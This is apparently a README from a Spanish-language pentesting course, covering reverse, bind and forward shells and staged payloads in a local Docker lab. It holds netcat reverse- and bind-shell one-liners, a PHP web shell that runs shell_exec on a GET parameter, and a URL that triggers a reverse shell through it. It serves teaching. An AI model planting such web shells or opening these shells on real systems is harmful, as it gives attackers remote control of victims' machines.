.. | ||
Dockerfile | ||
README.md | ||
tty_over_http.py |
TEMA 5 - Conceptos básicos de enumeración y explotación
5.1 Reverse Shells, Bind Shells y Forward Shells
Diferencias entre Reverse Shell, Bind Shell y Forward Shell:
- Reverse Shell: Es una técnica que permite a un atacante conectarse a una máquina remota desde una máquina de su propiedad. Es decir, se establece una conexión desde la máquina comprometida hacia la máquina del atacante. Esto se logra ejecutando un programa malicioso o una instrucción específica en la máquina remota que establece la conexión de vuelta hacia la máquina del atacante, permitiéndole tomar el control de la máquina remota.
- Bind Shell: Esta técnica es el opuesto de la Reverse Shell, ya que en lugar de que la máquina comprometida se conecte a la máquina del atacante, es el atacante quien se conecta a la máquina comprometida. El atacante escucha en un puerto determinado y la máquina comprometida acepta la conexión entrante en ese puerto. El atacante luego tiene acceso por consola a la máquina comprometida, lo que le permite tomar el control de la misma.
- Forward Shell: Esta técnica se utiliza cuando no se pueden establecer conexiones Reverse o Bind debido a reglas de Firewall implementadas en la red. Se logra mediante el uso de mkfifo, que crea un archivo FIFO (named pipe), que se utiliza como una especie de “consola simulada” interactiva a través de la cual el atacante puede operar en la máquina remota. En lugar de establecer una conexión directa, el atacante redirige el tráfico a través del archivo FIFO, lo que permite la comunicación bidireccional con la máquina remota.
Es importante entender las diferencias entre estas técnicas para poder determinar cuál es la mejor opción en función del escenario de ataque y las limitaciones de la red.
Práctica con el contenedor Docker de ubuntu_apache.
- Primer supuesto (Reverse Shell):
- En escucha desde anfitrión:
nc -nlvp 443
- Conexión desde el contenedor:
ncat -e /bin/bash ip_anfitrión 443
- En escucha desde anfitrión:
- Segundo supuesto (Bind Shell):
- Se envía desde el contenedor una shell:
nc -nlvp 443 -e /bin/bash
- Se conecta desde el anfitrión:
nc ip_contenedor 443
- Se envía desde el contenedor una shell:
- Tercer supuesto (Forward Shell):
- Añadirmos iptables:
apt install -y iptables
iptables --flush
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 0:65535 -m conntrack --ctstate NEW -j DROP
- Borramos el
index.html
y creamos el ficherocmd.php
en/var/www/html
:<?php if (isset($_GET['cmd'])) { $command = $_GET['cmd']; $output = shell_exec($command); if ($output === null) { echo "Error al ejecutar el comando."; } else { echo "<pre>" . $output . "</pre>"; } } else { echo "Por favor, proporciona un comando a ejecutar."; } ?>
- Ya podremos enviar comandos por get:
http://localhost/cmd.php?cmd=whoami
http://localhost/cmd.php?cmd=ps%20-faux
- Si ponemos en escucha al anfitrión:
nc -nlvp 443
podremos conectarnos desde la url:http://localhost/cmd.php?cmd=nc%20ip_anfitrión%20443%20-e%20/bin/bash
- En el caso que tuviese unas iptables que no permitieran la conexión se puede utilizar este script Python:
- Se puede entablar una Reverse Shell de muchas maneras:
- Añadirmos iptables:
5.2 Tipos de payloads (Staged y Non-Staged)
- Payload Staged: Es un tipo de payload que se divide en dos o más etapas. La primera etapa es una pequeña parte del código que se envía al objetivo, cuyo propósito es establecer una conexión segura entre el atacante y la máquina objetivo. Una vez que se establece la conexión, el atacante envía la segunda etapa del payload, que es la carga útil real del ataque. Este enfoque permite a los atacantes sortear medidas de seguridad adicionales, ya que la carga útil real no se envía hasta que se establece una conexión segura.
- Payload Non-Staged: Es un tipo de payload que se envía como una sola entidad y no se divide en múltiples etapas. La carga útil completa se envía al objetivo en un solo paquete y se ejecuta inmediatamente después de ser recibida. Este enfoque es más simple que el Payload Staged, pero también es más fácil de detectar por los sistemas de seguridad, ya que se envía todo el código malicioso de una sola vez.
Es importante tener en cuenta que el tipo de payload utilizado en un ataque dependerá del objetivo y de las medidas de seguridad implementadas. En general, los payloads Staged son más difíciles de detectar y son preferidos por los atacantes, mientras que los payloads Non-Staged son más fáciles de implementar pero también son más fáciles de detectar.